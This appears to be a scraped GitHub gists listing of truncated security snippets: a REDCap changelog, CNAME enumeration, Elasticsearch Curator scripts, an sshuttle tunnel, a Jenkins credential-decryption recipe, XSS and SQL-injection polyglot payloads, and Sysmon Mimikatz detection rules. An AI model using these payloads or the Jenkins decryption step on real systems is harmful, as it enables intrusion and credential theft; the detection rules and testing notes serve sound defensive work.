This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ChangeLog: Standard Release | |
Version 7.5.1 - (released 7/12/2017) | |
BUG FIXES & OTHER CHANGES: | |
Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating the query string of an HTTP request or REDCap link. | |
Medium security fix: A cross-site scripting vulnerability was found that could be exploited by a malicious user by manipulating text strings input into conversation titles or messages in REDCap Messenger. | |
Major bug fix: On certain occasions, the cron job that schedules Automated Survey Invitations containing conditional logic using datediff() with "today" as a parameter might mistakenly remove survey invitations that have been scheduled for another project. This would result in random survey participants not receiving their invitations. This issue occurs very seldom. | |
Minor security fix: A couple functions (e.g., deleting files in the File Repository or on File Upload fields) were mistakenly not being protected from Cross-site Request Forger |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while read i; do dig CNAME "$i" @8.8.8.8; done < ./<HOST LIST> > cname_domainname | |
cat cname_domainname|grep "IN CNAME" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#This bash script will delete the oldest logs and move to more recent logs until it reaches the desired free space on disk. | |
#Running curator in this fashion is only recomended for single node clusters or standalone setup's such as the HELK. | |
# This df command grabs the free space of the root '/', if you store your logs elsewhere you will have to modify this. | |
disk=$(df -H | grep -vE '^Mounted| /.' | awk '{ print $1 " " $5 " " $6 }' | awk 'NR == 2' | awk '{print $2}' |sed 's/%//') | |
#If you have more than 90 days of logs, this number will have to be increased, went with 90 days with the idea that you will reach | |
#your disk space limit before 90 days. | |
days=90 | |
# Disk threshold at 80 percent and also will not delete logs within the last 2 days. | |
while [ "$disk" > 80 ] && [ "$days" != 2 ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
actions: | |
1: | |
action: delete_indices | |
description: >- | |
Delete indices older than X days (based on index name), for winlogbeat- | |
prefixed indices. Ignore the error if the filter does not result in an | |
actionable list of indices (ignore_empty_list) and exit cleanly. | |
options: | |
ignore_empty_list: True | |
disable_action: False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
client: | |
hosts: | |
- 127.0.0.1 | |
port: 9200 | |
url_prefix: | |
use_ssl: False | |
certificate: | |
client_cert: | |
client_key: | |
ssl_no_validate: False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#It's not directly mentioned in the documentation on how to do this, so here you go. This command will tunnel everything including DNS: | |
sshuttle --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#To Decrypt Jenkins Password from credentials.xml | |
#<username>jenkins</username> | |
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase> | |
#go to the jenkins url | |
http://jenkins-host/script | |
#In the console paste the script | |
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> | |
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">  | |
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | |
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ | |
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Mimikatz Detection --> | |
<ImageLoaded condition="is">C:\Windows\System32\WinSCard.dll</ImageLoaded> <!--MimiKatz Detection Credit: @Cyb3rWard0g: https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html --> | |
<ImageLoaded condition="is">C:\Windows\System32\cryptdll.dll</ImageLoaded> <!--MimiKatz Detection Credit: @Cyb3rWard0g: https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html --> | |
<ImageLoaded condition="is">C:\Windows\System32\hid.dll</ImageLoaded> <!--MimiKatz Detection Credit: @Cyb3rWard0g: https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html --> | |
<ImageLoaded condition="is">C:\Windows\System32\samlib.dll</ImageLoaded> <!--MimiKatz Detection Credit: @Cyb3rWard0g: https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html --> | |
<ImageLoaded condition="is">C:\Windows\System32\vaultcli.dll</ImageLoaded> <!--MimiKatz Detection Credit: @Cyb3rWard0g: https://cyberwardog.blogspot.com/2017/03/ch |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/jordanpotti/ElastAlertGrouper.git | |
cp ElastAlertGrouper/py-alert.py /bin/ | |
chmod 755 /bin/py-alert.py | |
cp ElastAlertGrouper/alert_rules/* /etc/elastalert/alert_rules/ | |
service elastalert restart |
OlderNewer